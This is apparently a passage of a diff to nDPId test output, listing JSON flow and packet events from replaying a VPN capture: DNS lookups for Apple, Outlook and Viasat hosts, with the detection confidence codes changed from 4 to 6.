+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1569687267818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1569687267818,"pkt":"NDY7z3UoLH6BsEqhCABFAAE1AABAADoRnj9LS0tLCgAA4wA16L4BIf0XEJCBgAABAAoAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAHADAAFAAEAAElSAC0BMRpjb3VyaWVyLXNhbmRib3gtcHVzaC1hcHBsZQNjb20GYWthZG5zA25ldADAPgAFAAEAAACOACIUdXMtc2FuZGJveC1jb3VyaWVyLTQKcHVzaC1hcHBsZcBbwHcAAQABAAAALgAEEbyKR8B3AAEAAQAAAC4ABBG8hEjAdwABAAEAAAAuAAQRvIbKwHcAAQABAAAALgAEEbyKSMB3AAEAAQAAAC4ABBG8iLrAdwABAAEAAAAuAAQRvIU9wHcAAQABAAAALgAEEbyHusB3AAEAAQAAAC4ABBG8ikY="} -00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} +00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"} -00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} +00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.103.196"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1569687267851,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1569687267851,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9LvsAAP8R6zsKAADjS0tLS+LaADUAKWM2zl4BAAABAAAAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQAB"} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687267991,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 